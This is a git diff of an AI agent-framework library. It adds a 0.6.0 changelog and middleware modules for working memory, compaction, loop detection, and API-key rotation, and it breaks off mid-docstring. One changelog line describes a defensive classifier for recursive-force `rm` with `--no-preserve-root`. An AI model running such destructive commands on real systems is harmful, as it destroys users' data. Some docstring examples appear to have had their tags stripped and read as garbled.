diff --git a/CHANGELOG.md b/CHANGELOG.md index c14abe9..de38697 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -7,8 +7,92 @@ the GitHub Release body, so a release with no entry here fails. Versioning follows [docs/versioning.md](docs/versioning.md). +## [0.6.0] - 2026-09-04 + +### Added + +- `agent_core.components.middleware.base.MiddlewareChain` — the phase/tool + middleware runner for the `ExecutionMiddleware` contract that + `agent_core.protocols` already declared. Core previously shipped the contract + and the structural `PhaseMiddlewareChain` without a runner. +- Portable middlewares, extracted from ApodexHarness: + `middleware.rate_limit` (token-bucket RPM/TPM), `middleware.tool_audit` + (pattern-based bash / web_fetch risk classification with veto), + `middleware.status_report` (sub-agent phase heartbeat over the agent bus), + `middleware.todo` (task-progress injection), and under `middleware.llm`: + `retry`, `tracing`, `loop_detection`, `output_repair`, `api_key_rotation`, + `compaction`, `token_accounting`. +- `agent_core.components.memory` — `WorkingMemory` and its snapshot + recovery, which `middleware.todo` reads. +- `agent_core.protocols.CostSink` and `agent_core.protocols.CostPersister`. + `CostSink.record` is synchronous and runs per call; `CostPersister.persist` + runs once at completion and is the only path that reaches durable storage. + +See [docs/middleware-boundary.md](docs/middleware-boundary.md) for what stays +with the host — the composition root, chain ordering, trace/event sinks, and any +phase middleware that needs host services. + +### Changed + +- `LLMCallContext.metadata`'s field factory is now parametrised. No behavioral + change; it stopped every consumer of `ctx.metadata` from type-checking as + unknown. +- `CostSink` now states its full contract: `record(...)` plus + `get_summary(task_id)`. Configuring a `CostPersister` with a record-only sink + fails immediately instead of silently skipping final persistence. +- `StatusReportMiddleware` no longer knows the research result schema. Hosts can + pass `result_summarizer(result)` to add their own status fields. +- `TodoMiddleware` obtains domain-specific progress through + `WorkingMemory.one_line_summary()`, which subclasses can override. +- `ToolAuditMiddleware` accepts an optional host-owned `bash_classifier`. Its + built-in regex classifier is a conservative defense-in-depth fallback, not a + replacement for a sandbox or a host filesystem policy. + +### Fixed + +- `TokenBucket.acquire` now rechecks and reserves capacity atomically after + sleeping, so concurrent waiters cannot spend the same refill and drive the + bucket negative. +- `LoopDetectionMiddleware` isolates history and pending hints by task/session, + role, and phase, and bounds retained scopes. One task can no longer inject a + loop warning into another. +- Recursive-force `rm` classification recognizes split, reordered, and long + flags, including `--no-preserve-root`. +- `LLMTracingMiddleware` keeps its start time on `LLMCallContext`; a terminal + chat failure can no longer leak an entry in a process-long timer dictionary. + +### Consumer action + +**`TokenAccountingMiddleware` no longer takes `session_factory`.** It takes +`cost_persister: CostPersister | None` instead, and `persist_cost` forwards the +summary rather than writing a table itself. A host that passed a SQLAlchemy +session factory must now pass an object with +`async persist(task_id, summary, model)`; the table name, the column names and +the transaction boundary move with it. Passing neither seam leaves `persist_cost` +a no-op, unchanged. + +When `cost_persister` is configured, `cost_sink` must implement both +`record(...)` and `get_summary(task_id)`. Record-only sinks remain valid when +durable persistence is not configured. + +Hosts that want research-specific status fields should construct +`StatusReportMiddleware(result_summarizer=...)`; AgentCore no longer reads +`evidence_cards` or `assertions` directly. + +Everything else only adds modules. A product adopting these should replace its +own copies with import aliases rather than keeping both. + +Note for anyone carrying a private fork of the compaction prompt: +`agent_core.runtime.loop.summary_prompt` has moved on — it now offers +`RESEARCH_COMPACTION_PROMPT`, `HANDOFF_COMPACTION_PROMPT` and a +`compaction_prompt()` selector, with `COMPACTION_PROMPT` aliasing the research +shape. `middleware.llm.compaction` uses it directly. + ## [0.5.0] - 2026-09-04 +**Never published.** Merged to `main` but never tagged; its contents ship in +0.6.0. Nothing pins it. + ### Added - `agent_core.components.cycle` — the product-neutral write → audit → feedback → diff --git a/agent_core/components/memory/__init__.py b/agent_core/components/memory/__init__.py new file mode 100644 index 0000000..ca23c7e --- /dev/null +++ b/agent_core/components/memory/__init__.py @@ -0,0 +1,23 @@ +"""Generic working memory primitives shared by every workflow. + +The base ``WorkingMemory`` class lives here. Research-specific +extensions (``evidence_cards``, ``assertions_draft``, +``record_evidence``) live as a subclass at +``workflows/default_research/memory.py:ResearchWorkingMemory``. +""" + +from agent_core.components.memory.working_memory import ( + MAX_KEY_FINDINGS, + MAX_TOOL_CALLS_IN_MARKDOWN, + ToolCallRecord, + WorkingMemory, + current_working_memory, +) + +__all__ = [ + "MAX_KEY_FINDINGS", + "MAX_TOOL_CALLS_IN_MARKDOWN", + "ToolCallRecord", + "WorkingMemory", + "current_working_memory", +] diff --git a/agent_core/components/memory/working_memory.py b/agent_core/components/memory/working_memory.py new file mode 100644 index 0000000..efbd3f7 --- /dev/null +++ b/agent_core/components/memory/working_memory.py @@ -0,0 +1,255 @@ +"""Generic ``WorkingMemory`` — structured per-loop recording shared by every workflow. + +Records tool calls, key findings, and skill activations during a ReAct +loop. Persists snapshots to ``EventStore`` every N turns for crash +recovery, and provides structured markdown for compaction middleware +to inject as a lossless context summary. + +Three responsibilities: + +1. **Record** — accumulate tool calls, findings, and skills per turn. +2. **Persist** — serialize to ``EventStore`` every ``persist_interval`` + turns for crash recovery. +3. **Inject** — render structured markdown for auto-compact context + injection (so a long-running loop doesn't lose its bearings after + message-history compaction). + +Layering +--------------------- +This base class is workflow-agnostic. Domain extensions (research-side +``evidence_cards`` / ``assertions_draft``) live as a subclass at +``workflows/default_research/memory.py:ResearchWorkingMemory``. Subclasses +override ``serialize`` / ``from_snapshot`` / ``to_markdown`` to thread +their own fields through the persistence and injection paths. +""" + +from __future__ import annotations + +import logging +from contextvars import ContextVar +from dataclasses import dataclass, field +from typing import TYPE_CHECKING, Any + +from agent_core.events import EventType + +if TYPE_CHECKING: + from agent_core.protocols import EventReader, EventSink + +logger = logging.getLogger(__name__) + +# ContextVar so middleware (compaction / token accounting / todo) can +# reach the active WorkingMemory without explicit threading. +current_working_memory: ContextVar[WorkingMemory | None] = ContextVar( + "current_working_memory", default=None, +) + +MAX_KEY_FINDINGS = 20 +MAX_TOOL_CALLS_IN_MARKDOWN = 10 + + +@dataclass +class ToolCallRecord: + """Single tool invocation record.""" + + tool_name: str + tool_args_preview: str # truncated args for display + result_preview: str # truncated result + turn: int + duration_ms: int = 0 + evidence_count: int = 0 + + def serialize(self) -> dict[str, Any]: + return { + "tool_name": self.tool_name, + "tool_args_preview": self.tool_args_preview, + "result_preview": self.result_preview, + "turn": self.turn, + "duration_ms": self.duration_ms, + "evidence_count": self.evidence_count, + } + + @classmethod + def from_dict(cls, d: dict[str, Any]) -> ToolCallRecord: + return cls( + tool_name=d.get("tool_name", ""), + tool_args_preview=d.get("tool_args_preview", ""), + result_preview=d.get("result_preview", ""), + turn=d.get("turn", 0), + duration_ms=d.get("duration_ms", 0), + evidence_count=d.get("evidence_count", 0), + ) + + +@dataclass +class WorkingMemory: + """Generic working memory for a single ReAct loop execution. + + Workflow-agnostic. Records tool calls, key findings, and skill + activations; persists / recovers via ``EventStore`` snapshots. + Subclasses extend with domain-specific fields (e.g. + ``ResearchWorkingMemory.evidence_cards``). + """ + + task_id: str = "" + tool_calls: list[ToolCallRecord] = field( + default_factory=list[ToolCallRecord], + ) + key_findings: list[str] = field(default_factory=list[str]) + loaded_skills: list[dict[str, Any]] = field( + default_factory=list[dict[str, Any]], + ) + search_count: int = 0 + iteration_count: int = 0 + last_persist_turn: int = 0 + persist_interval: int = 5 + + # ── Recording ──────────────────────────────────────────────────── + + def record_tool_call( + self, + tool_name: str, + tool_args: dict[str, Any], + result: str, + turn: int, + duration_ms: int = 0, + evidence_count: int = 0, + ) -> None: + self.tool_calls.append( + ToolCallRecord( + tool_name=tool_name, + tool_args_preview=str(tool_args)[:150], + result_preview=result[:200], + turn=turn, + duration_ms=duration_ms, + evidence_count=evidence_count, + ) + ) + if tool_name in ("web_search", "web_fetch"): + self.search_count += 1 + + def record_finding(self, text: str) -> None: + self.key_findings.append(text) + if len(self.key_findings) > MAX_KEY_FINDINGS: + self.key_findings = self.key_findings[-MAX_KEY_FINDINGS:] + + def record_skill_loaded(self, skill_id: str, skill_name: str, turn: int) -> None: + """Record a skill activation for compaction preservation.""" + if not any(s["skill_id"] == skill_id for s in self.loaded_skills): + self.loaded_skills.append({ + "skill_id": skill_id, + "skill_name": skill_name, + "turn": turn, + }) + + # ── Persistence ────────────────────────────────────────────────── + + def should_persist(self) -> bool: + return (self.iteration_count - self.last_persist_turn) >= self.persist_interval + + def serialize(self) -> dict[str, Any]: + return { + "task_id": self.task_id, + "tool_calls": [tc.serialize() for tc in self.tool_calls], + "key_findings": self.key_findings, + "loaded_skills": self.loaded_skills, + "search_count": self.search_count, + "iteration_count": self.iteration_count, + "last_persist_turn": self.last_persist_turn, + "persist_interval": self.persist_interval, + } + + @classmethod + def from_snapshot(cls, payload: dict[str, Any]) -> WorkingMemory: + wm = cls( + task_id=payload.get("task_id", ""), + key_findings=payload.get("key_findings", []), + loaded_skills=payload.get("loaded_skills", []), + search_count=payload.get("search_count", 0), + iteration_count=payload.get("iteration_count", 0), + last_persist_turn=payload.get("last_persist_turn", 0), + persist_interval=payload.get("persist_interval", 5), + ) + for tc_dict in payload.get("tool_calls", []): + wm.tool_calls.append(ToolCallRecord.from_dict(tc_dict)) + return wm + + async def persist(self, event_store: EventSink) -> None: + """Persist current state to EventStore as a snapshot event.""" + await event_store.append( + task_id=self.task_id, + event_type=EventType.WORKING_MEMORY_SNAPSHOT, + payload=self.serialize(), + agent_role="system", + ) + self.last_persist_turn = self.iteration_count + logger.info( + "WorkingMemory persisted for task %s at turn %d (%d tools)", + self.task_id, self.iteration_count, len(self.tool_calls), + ) + + @classmethod + async def recover( + cls, event_store: EventReader, task_id: str, + ) -> WorkingMemory | None: + """Try to recover from the latest EventStore snapshot. + + Returns ``None`` if no snapshot exists. Subclasses inherit this + unchanged — ``cls.from_snapshot`` dispatches to the subclass + implementation, so a ``ResearchWorkingMemory.recover(...)`` call + rebuilds research-specific fields automatically. + """ + events = await event_store.get_events( + task_id=task_id, + event_type=EventType.WORKING_MEMORY_SNAPSHOT, + ) + if not events: + return None + latest = events[-1] + payload: dict[str, Any] = ( + latest.payload if hasattr(latest, "payload") else {} + ) + wm = cls.from_snapshot(payload) + logger.info( + "WorkingMemory recovered for task %s from turn %d", + task_id, wm.iteration_count, + ) + return wm + + # ── Summaries ──────────────────────────────────────────────────── + + def one_line_summary(self) -> str: + return ( + f"{len(self.tool_calls)} tools, " + f"{self.search_count} searches, " + f"turn {self.iteration_count}" + ) + + def to_markdown(self) -> str: + """Generic structured markdown for compaction context injection. + + Renders findings + active skills + a tail of the tool call log. + Subclasses override to add domain sections (e.g. Evidence). + """ + parts: list[str] = [] + + if self.key_findings: + parts.append("## Key Findings") + for f in self.key_findings: + parts.append(f"- {f}") + + if self.loaded_skills: + parts.append("\n## Active Skills") + for sk in self.loaded_skills: + parts.append( + f"- **{sk['skill_name']}** (id={sk['skill_id']}, " + f"loaded at turn {sk['turn']})" + ) + + if self.tool_calls: + parts.append(f"\n## Tool Call Log ({len(self.tool_calls)} total)") + for tc in self.tool_calls[-MAX_TOOL_CALLS_IN_MARKDOWN:]: + parts.append( + f"- T{tc.turn}: {tc.tool_name} → {tc.result_preview[:80]}" + ) + + return "\n".join(parts) diff --git a/agent_core/components/middleware/base.py b/agent_core/components/middleware/base.py new file mode 100644 index 0000000..ad24113 --- /dev/null +++ b/agent_core/components/middleware/base.py @@ -0,0 +1,79 @@ +"""Execution Middleware — composable hooks for phase and tool execution. + +``MiddlewareChain`` is the runner. The contract it runs -- the +``ExecutionMiddleware`` base with its before/after phase, before/after tool and +on_error hooks, plus the ``PhaseContext`` / ``ToolCallContext`` dataclasses +threaded through them -- lives in :mod:`agent_core.protocols`, which also +declares the structural ``PhaseMiddlewareChain`` that hosts resolve this through. + +After-hooks run in reverse registration order, so a chain nests rather than +merely sequences: the first middleware registered is the outermost layer. + +Concrete middlewares live beside this module and in +:mod:`agent_core.components.middleware.llm`. A host may also register its own; +nothing here enumerates them. +""" + +from __future__ import annotations + +import logging +from typing import Any + +from agent_core.protocols import ( + ExecutionMiddleware, + PhaseContext, + ToolCallContext, +) + +logger = logging.getLogger(__name__) + + +# ── Middleware chain ─────────────────────────────────────────────────────── + + +class MiddlewareChain: + """Ordered collection of middlewares. Runs hooks sequentially.""" + + def __init__(self) -> None: + self._middlewares: list[ExecutionMiddleware] = [] + + def add(self, middleware: ExecutionMiddleware) -> None: + self._middlewares.append(middleware) + + def remove(self, middleware_type: type) -> None: + self._middlewares = [m for m in self._middlewares if not isinstance(m, middleware_type)] + + @property + def middlewares(self) -> list[ExecutionMiddleware]: + return list(self._middlewares) + + async def run_before_phase(self, ctx: PhaseContext) -> PhaseContext: + for mw in self._middlewares: + ctx = await mw.before_phase(ctx) + return ctx + + async def run_after_phase(self, ctx: PhaseContext, result: dict[str, Any]) -> dict[str, Any]: + # Onion model: after hooks run in reverse order + for mw in reversed(self._middlewares): + result = await mw.after_phase(ctx, result) + return result + + async def run_before_tool_call(self, ctx: ToolCallContext) -> ToolCallContext: + for mw in self._middlewares: + ctx = await mw.before_tool_call(ctx) + return ctx + + async def run_after_tool_call(self, ctx: ToolCallContext, result: str) -> str: + # Onion model: after hooks run in reverse order + for mw in reversed(self._middlewares): + result = await mw.after_tool_call(ctx, result) + return result + + async def run_on_error(self, ctx: PhaseContext, error: Exception) -> Exception | None: + """Run error handlers. If any middleware returns None, error is suppressed.""" + for mw in self._middlewares: + result = await mw.on_error(ctx, error) + if result is None: + return None + error = result + return error diff --git a/agent_core/components/middleware/llm/api_key_rotation.py b/agent_core/components/middleware/llm/api_key_rotation.py new file mode 100644 index 0000000..9d3be23 --- /dev/null +++ b/agent_core/components/middleware/llm/api_key_rotation.py @@ -0,0 +1,212 @@ +"""In-stream API-key rotation — future placeholder for L1 same-provider +mid-stream optimization. + +**Status: scaffolded, NOT used.** As of the heavy_mode provider chain +landing (docs/superpowers/specs/2026-05-12-heavy-mode-provider-chain-design.md +§10), all production fallback work — L1 same-provider key rotation +included — happens between-call at the workflow layer via +:func:`workflows.heavy_mode.utils.provider_chain.run_with_chain`. + +This module remains as the explicit future home for the *mid-stream* +optimization within L1: when an in-flight LLM stream hits a retriable +error (e.g. Anthropic 529), swap the underlying httpx client's +Authorization header to the next key without tearing down the request +and losing accumulated chunks. The between-call path already handles +this correctly (it just costs one ReAct turn); mid-stream is a future +latency optimization, not a correctness fix. + +Implementation pre-conditions (not met yet): + +1. Sufficient production telemetry showing that between-call L1 + rotation costs measurable user-visible latency (>5s p95 added + per rotation). +2. Validation that langchain's stream graph survives mid-stream + credential swap without rebuild (the open question that scared + this module off in the first place). + +Until those are met: do NOT use this middleware. ``LLMProxy`` chains +in production should not include ``APIKeyRotationMiddleware``. The +NotImplementedError in :meth:`_rotate_client_credentials` is +intentional — it ensures accidental enablement fails loudly rather +than silently passing through the chain. +""" + +from __future__ import annotations + +import logging +from typing import Any + +from agent_core.components.middleware.llm.base import ( + LLMCallContext, + LLMMiddleware, +) +from agent_core.retry_policy import legacy_retryable + +logger = logging.getLogger(__name__) + +__all__ = ["APIKeyRotationMiddleware"] + + +_STATE_KEY = "_api_key_rotation_state" + + +class APIKeyRotationMiddleware(LLMMiddleware): + """Rotate API keys on retriable errors without restarting the ReAct loop. + + Args: + api_keys: ordered list of API keys to try. The first is the + "primary" — used until it fails with a retriable error. + The middleware is keyless and pass-through when the list + has < 2 entries. + llm: the inner langchain LLM whose credentials get mutated. + **Currently unused** — see :meth:`_rotate_client_credentials`. + Held so the operator filling in the placeholder has the + client handle at hand without threading it through every + hook call. + max_total_rotations: cap across all calls handled by this + middleware instance to prevent runaway retry loops if the + error pattern is something other than auth/rate-limit. + + Lifecycle (placeholder semantics): + + - :meth:`before_llm` is a no-op. The first call uses + ``api_keys[0]`` — whatever the LLM was constructed with. + - :meth:`on_llm_error` checks if the error is retriable (via + :func:`~agent_core.retry_policy.legacy_retryable`). If yes AND keys remain, calls + :meth:`_rotate_client_credentials` to swap to the next key, then + returns ``True`` to ask the proxy to retry. If no keys remain or + the error is non-retriable, returns ``False`` so the outer + cross-provider fallback (V3) can take over. + """ + + def __init__( + self, + *, + api_keys: list[str], + llm: Any = None, + max_total_rotations: int = 8, + ) -> None: + if not api_keys: + raise ValueError("api_keys must contain at least one key") + self._api_keys: list[str] = list(api_keys) + self._llm = llm + self._max_total_rotations = max_total_rotations + # Process-wide rotation counter so a runaway error pattern + # can't burn through max_total_rotations × n_concurrent_calls. + self._total_rotations = 0 + + @property + def name(self) -> str: + return "api_key_rotation" + + @property + def enabled(self) -> bool: + # Single-key configs short-circuit the whole middleware so the + # common case (no rotation configured) costs zero per call. + return len(self._api_keys) >= 2 + + async def on_llm_error( + self, + ctx: LLMCallContext, + error: Exception, + attempt: int, + ) -> bool: + """Return True to ask :class:`LLMProxy` to retry with rotated creds.""" + if not legacy_retryable(error): + return False + + state = self._get_state(ctx) + if state["next_idx"] >= len(self._api_keys): + logger.warning( + "APIKeyRotation: all %d keys exhausted (call_index=%d, " + "attempt=%d) — yielding to outer fallback", + len(self._api_keys), ctx.call_index, attempt, + ) + return False + + if self._total_rotations >= self._max_total_rotations: + logger.warning( + "APIKeyRotation: hit max_total_rotations=%d — refusing to " + "rotate further; outer retry/fallback should pick up", + self._max_total_rotations, + ) + return False + + next_idx = int(state["next_idx"]) + next_key = self._api_keys[next_idx] + try: + self._rotate_client_credentials(next_key) + except Exception: + # Rotation itself blew up — bail rather than retry into + # a half-mutated client. Surface as warning so the operator + # filling in the placeholder sees their stub failed. + logger.exception( + "APIKeyRotation: _rotate_client_credentials raised — " + "aborting rotation, error will propagate", + ) + return False + + state["next_idx"] = next_idx + 1 + self._total_rotations += 1 + ctx.metadata["api_key_rotation_idx"] = next_idx + logger.warning( + "APIKeyRotation: swapping to key #%d after retriable %s " + "(call_index=%d, attempt=%d, total_rotations=%d)", + next_idx, type(error).__name__, ctx.call_index, attempt, + self._total_rotations, + ) + return True + + # ── Placeholder — operator fills in ───────────────────────────── + + def _rotate_client_credentials(self, new_api_key: str) -> None: + """Swap ``new_api_key`` into the underlying provider client. + + **PLACEHOLDER.** This is the one piece that depends on which + provider wrapper we're rotating against; the operator wiring + this middleware into production fills it in. + + OpenAI (langchain_openai.ChatOpenAI) — sketch:: + + inner = self._llm + # The httpx clients hold the Authorization header. Mutating + # both keeps sync + async paths consistent. + inner.openai_api_key = SecretStr(new_api_key) + if inner.client is not None: + inner.client.api_key = new_api_key + if inner.async_client is not None: + inner.async_client.api_key = new_api_key + + Anthropic — different attribute path. Provider-specific code + lives here; the rest of the middleware is provider-agnostic. + + Raises: + Whatever the provider client raises on a bad key handle. + The caller turns this into "rotation aborted" rather than + propagating into the retry loop. + """ + del new_api_key + # TODO(operator): wire the provider-specific credential swap. + # Until then, raising NotImplementedError makes accidental + # production usage loud rather than silent. + raise NotImplementedError( + "APIKeyRotationMiddleware._rotate_client_credentials is a " + "placeholder. Fill in the provider-specific client mutation " + "(see docstring) before enabling this middleware in a " + "production profile.", + ) + + # ── State scoping ─────────────────────────────────────────────── + + def _get_state(self, ctx: LLMCallContext) -> dict[str, Any]: + """Per-call rotation cursor, keyed by ``ctx.call_index``. + + Fresh calls start from key #1 (next after primary). A single + call may rotate up to ``len(api_keys) - 1`` times before + falling through to the outer fallback. + """ + bag = ctx.metadata.setdefault(_STATE_KEY, {}) + key = ctx.call_index + if key not in bag: + bag[key] = {"next_idx": 1} + return bag[key] diff --git a/agent_core/components/middleware/llm/base.py b/agent_core/components/middleware/llm/base.py index 776b139..45a9a0c 100644 --- a/agent_core/components/middleware/llm/base.py +++ b/agent_core/components/middleware/llm/base.py @@ -48,7 +48,7 @@ class LLMCallContext: role_id: str = "" phase_id: str = "" call_index: int = 0 - metadata: dict[str, Any] = field(default_factory=dict) + metadata: dict[str, Any] = field(default_factory=dict[str, Any]) # ── Protocol ───────────────────────────────────────────────────────────── diff --git a/agent_core/components/middleware/llm/compaction.py b/agent_core/components/middleware/llm/compaction.py new file mode 100644 index 0000000..a4bd55e --- /dev/null +++ b/agent_core/components/middleware/llm/compaction.py @@ -0,0 +1,195 @@ +"""State-aware context compaction for agent loops. + +Rolling-summary helper that the caller invokes BEFORE each LLM call. On +each invocation: + - If `messages` is under `threshold`, returns the input unchanged. + - Otherwise, compacts the middle slice into a single rolling summary + via `summary_llm`, keeping the system message and the last + `keep_recent` turns. Returns the new list + `did_compact=True`. + +Caller is expected to mutate its persistent message list when +`did_compact=True`: + + new_msgs, compacted = await compact_if_needed(messages, ...) + if compacted: + messages[:] = new_msgs + +This is the state-aware counterpart to `SummarizationMiddleware`, which +runs every LLM call and re-summarizes the same persistent state from +scratch (stateless `before_llm`). State-aware avoids re-summarizing on +every call and keeps cost O(number-of-threshold-crossings) rather than +O(turns-past-threshold). + +The summary prompt explicitly asks the summarizer to preserve entity +names, ruled-out candidates, consulted URLs, and verified facts — the +information types most often eroded by repeated summarization. Because +we use a rolling summary (not chained), each compaction passes the +previous summary back through summarization. The preservation prompt is +the safety net against drift. +""" + +from __future__ import annotations + +import logging +import re +from typing import Any, cast + +from agent_core.messages import ( + Message, + text_of, + user_msg, +) +from agent_core.runtime.loop.summary_prompt import ( + COMPACTION_PROMPT as _COMPACTION_PROMPT, +) +from agent_core.runtime.loop.summary_prompt import ( + format_conversation_for_summary as _format_conversation_for_summary, +) + +logger = logging.getLogger(__name__) + + +_MSG_OVERHEAD = 4 +_CJK_RE = re.compile(r"[ -〿一-鿿぀-ゟ゠-ヿ]") + + +def _estimate_tokens_heuristic(messages: list[Message]) -> int: + """Regex heuristic for mixed CJK/English text. ~10% accuracy. + + Used as fallback when tiktoken is unavailable. + """ + total = 0 + for m in messages: + text = text_of(m.get("content")) + cjk_count = len(_CJK_RE.findall(text)) + other_count = len(text) - cjk_count + total += cjk_count + (other_count // 4) + _MSG_OVERHEAD + return total + + +def estimate_tokens(messages: list[Message]) -> int: + """Estimate the token count of a message list. + + Prefers tiktoken cl100k_base (accurate for OpenAI-family models). + Falls back to a CJK-aware character heuristic otherwise. The encoder + loads on a daemon thread (see ``tokenizer.py``) so this never makes a + synchronous network fetch on the event-loop thread — the historical + cause of multi-minute loop wedges in egress-restricted containers. + """ + from agent_core.runtime.loop.tokenizer import get_encoding_nonblocking + encoder = get_encoding_nonblocking("cl100k_base") + if encoder is not None: + try: + total = 0 + for m in messages: + total += len( + encoder.encode( + text_of(m.get("content")), disallowed_special=() + ) + ) + _MSG_OVERHEAD + return total + except Exception: + pass + return _estimate_tokens_heuristic(messages) + + +async def _generate_summary( + summary_llm: Any, + to_summarize: list[Message], +) -> str: + """Run the summarizer LLM to compress `to_summarize` into one block.""" + conversation = _format_conversation_for_summary(to_summarize) + prompt = _COMPACTION_PROMPT.format(conversation=conversation) + resp = await summary_llm.chat([user_msg(prompt)]) + text = getattr(resp, "content", None) or "" + if isinstance(text, list): + blocks = cast("list[Any]", text) + text = "".join( + str(cast("dict[str, Any]", c).get("text", "")) + if isinstance(c, dict) + else str(c) + for c in blocks + ) + return text.strip() if isinstance(text, str) else str(text) + + +async def compact_if_needed( + messages: list[Message], + *, + threshold: int, + keep_recent: int, + summary_llm: Any, + task_id: str = "", +) -> tuple[list[Message], bool]: + """Compact `messages` if its estimated token count exceeds `threshold`. + + Returns `(new_messages, did_compact)`. When `did_compact=True` the + caller MUST replace its persistent state with `new_messages` + (typically `messages[:] = new_messages`) — this helper does NOT + mutate the input list. + + Layout of the compacted output: + [system_msg?, summary_msg, *recent_keep_recent_messages] + + The summary message is a `user` message containing a structured + rollup that preserves entity names, ruled-out candidates, consulted + URLs, and verified facts (see `_COMPACTION_PROMPT`). + + Args: + messages: the agent's current persistent message list. + threshold: token count above which compaction triggers. + keep_recent: number of recent messages to keep raw (uncompressed). + summary_llm: an :class:`LLMClient`-shaped LLM for the summary call. + task_id: optional task id for logging. + """ + token_est = estimate_tokens(messages) + if token_est <= threshold or len(messages) <= keep_recent + 1: + return messages, False + + # Split: optional leading system message + middle (to summarize) + tail + sys_msgs = [m for m in messages[:1] if m.get("role") == "system"] + rest = messages[len(sys_msgs):] + + split_idx = max(0, len(rest) - keep_recent) + # Don't start the kept window on an orphan tool message (no matching + # assistant message with tool_calls earlier in the kept window). + while split_idx < len(rest) - 1 and rest[split_idx].get("role") == "tool": + split_idx += 1 + + to_summarize = rest[:split_idx] + keep = rest[split_idx:] + + if not to_summarize: + # Below-keep_recent middle — nothing to compact. + return messages, False + + try: + summary_text = await _generate_summary(summary_llm, to_summarize) + except Exception as e: + logger.warning( + "compact_if_needed[task=%s]: summary LLM failed (%s), " + "falling back to drop-old truncation", + task_id, e, + ) + # Fallback: drop the middle entirely with a placeholder note. + # Better than crashing the agent loop on summarization failure. + summary_text = ( + f"[Summary unavailable — {len(to_summarize)} earlier " + f"messages dropped. Recent context preserved below.]" + ) + + summary_msg = user_msg( + "[Compacted summary of earlier turns — older raw messages " + "have been replaced by this rollup. Continue from here.]\n\n" + + summary_text + ) + + new_messages = [*sys_msgs, summary_msg, *keep] + new_token_est = estimate_tokens(new_messages) + logger.info( + "compact_if_needed[task=%s]: compacted %d→%d msgs " + "(%d→%d tokens, threshold=%d)", + task_id, len(messages), len(new_messages), + token_est, new_token_est, threshold, + ) + return new_messages, True diff --git a/agent_core/components/middleware/llm/loop_detection.py b/agent_core/components/middleware/llm/loop_detection.py new file mode 100644 index 0000000..5ffd0a0 --- /dev/null +++ b/agent_core/components/middleware/llm/loop_detection.py @@ -0,0 +1,140 @@ +from __future__ import annotations + +import hashlib +import logging +from collections import OrderedDict, deque + +from agent_core.components.middleware.llm.base import ( + LLMCallContext, + LLMMiddleware, +) +from agent_core.llm import LLMResponse +from agent_core.messages import Message, system_msg, text_of + +logger = logging.getLogger(__name__) + + +class LoopDetectionMiddleware(LLMMiddleware): + """Detects repeated tool call patterns and injects a strategy-switch hint. + + Tracks the last N tool calls (by name + args hash). If the same pattern + appears `trigger_count` times consecutively, injects a system hint + asking the LLM to try a different approach. + """ + + def __init__( + self, + pattern_window: int = 10, + trigger_count: int = 3, + max_scopes: int = 1024, + ) -> None: + if pattern_window <= 0: + raise ValueError("pattern_window must be positive") + if trigger_count <= 0: + raise ValueError("trigger_count must be positive") + if max_scopes <= 0: + raise ValueError("max_scopes must be positive") + self._window = pattern_window + self._trigger = trigger_count + self._max_scopes = max_scopes + self._histories: OrderedDict[tuple[str, str, str], deque[str]] = OrderedDict() + self._pending_hints: set[tuple[str, str, str]] = set() + + @property + def name(self) -> str: + return "loop_detection" + + def _hash_tool_calls(self, response: LLMResponse) -> str | None: + """Create a fingerprint of tool calls in the response. + + Native wire tool_calls are ``{id, type, function: {name, + arguments}}`` dicts, so the name lives under ``function.name`` + and the args are the JSON-encoded ``function.arguments`` string. + """ + tool_calls = response.tool_calls + if not tool_calls: + return None + sig = "|".join( + f"{(tc.get('function') or {}).get('name', '')}:" + f"{hashlib.md5(str((tc.get('function') or {}).get('arguments', '')).encode(), usedforsecurity=False).hexdigest()[:8]}" + for tc in tool_calls + ) + return sig + + @staticmethod + def _scope_key(ctx: LLMCallContext) -> tuple[str, str, str] | None: + """Return a stable per-conversation key, or None when none exists.""" + task_or_session = ctx.task_id or str(ctx.metadata.get("session_id") or "") + if not task_or_session: + # Sharing anonymous history is worse than disabling the heuristic: + # it would let unrelated callers contaminate one another. + return None + return task_or_session, ctx.role_id, ctx.phase_id + + def _history_for(self, key: tuple[str, str, str]) -> deque[str]: + history = self._histories.get(key) + if history is None: + history = deque[str](maxlen=self._window) + self._histories[key] = history + if len(self._histories) > self._max_scopes: + evicted, _ = self._histories.popitem(last=False) + self._pending_hints.discard(evicted) + else: + self._histories.move_to_end(key) + return history + + async def after_llm( + self, ctx: LLMCallContext, response: LLMResponse + ) -> LLMResponse: + key = self._scope_key(ctx) + if key is None: + return response + sig = self._hash_tool_calls(response) + if sig: + history = self._history_for(key) + history.append(sig) + # Check for consecutive repetition + if len(history) >= self._trigger: + recent = list(history)[-self._trigger:] + if len(set(recent)) == 1: + self._pending_hints.add(key) + logger.warning( + "LoopDetectionMiddleware: detected %d consecutive identical tool calls: %s", + self._trigger, sig, + ) + return response + + async def before_llm( + self, ctx: LLMCallContext, messages: list[Message] + ) -> list[Message]: + key = self._scope_key(ctx) + if key is not None and key in self._pending_hints: + self._pending_hints.discard(key) + history = self._histories.get(key) + if history is not None: + history.clear() + hint_text = ( + "\n\n[Loop detected] You have been repeating the same " + "tool calls. Please try a different approach: use " + "different search terms, try a different tool, or " + "synthesize from what you already have." + ) + # Merge into existing system message (some providers + # require the system message to be first and only). + messages = list(messages) + for i, msg in enumerate(messages): + if msg.get("role") == "system": + messages[i] = system_msg( + text_of(msg.get("content")) + hint_text, + ) + return messages + # No system message found — prepend as a system message + return [system_msg(hint_text.strip()), *messages] + return messages + + def cleanup_task(self, task_id: str) -> None: + """Release all loop-detection state retained for ``task_id``.""" + keys = [key for key in self._histories if key[0] == task_id] + for key in keys: + self._histories.pop(key, None) + self._pending_hints.discard(key) diff --git a/agent_core/components/middleware/llm/output_repair.py b/agent_core/components/middleware/llm/output_repair.py new file mode 100644 index 0000000..637239b --- /dev/null +++ b/agent_core/components/middleware/llm/output_repair.py @@ -0,0 +1,177 @@ +"""Generic LLM output repair — fix structural noise in raw model output. + +Master design Phase 3 PR-3.3 / §5.10. Distilled / open-weights chat models +occasionally emit malformed reasoning markup that downstream parsers +choke on. The two patterns observed in the wild: + +- **Duplicated closing tags**: ```` instead of a + single ````. Some R1-distilled models loop on the closing + token when greedy decoding caps a long chain-of-thought. +- **Unclosed thinking blocks**: an opening ```` / ```` + with no matching close, usually because the model hit ``max_tokens`` + mid-CoT. The thinking content then bleeds into whatever consumes the + message body. + +Both are silent failures — the chat completion is *successful* by API +status but the markup is broken. This middleware runs after every LLM +call and rewrites the 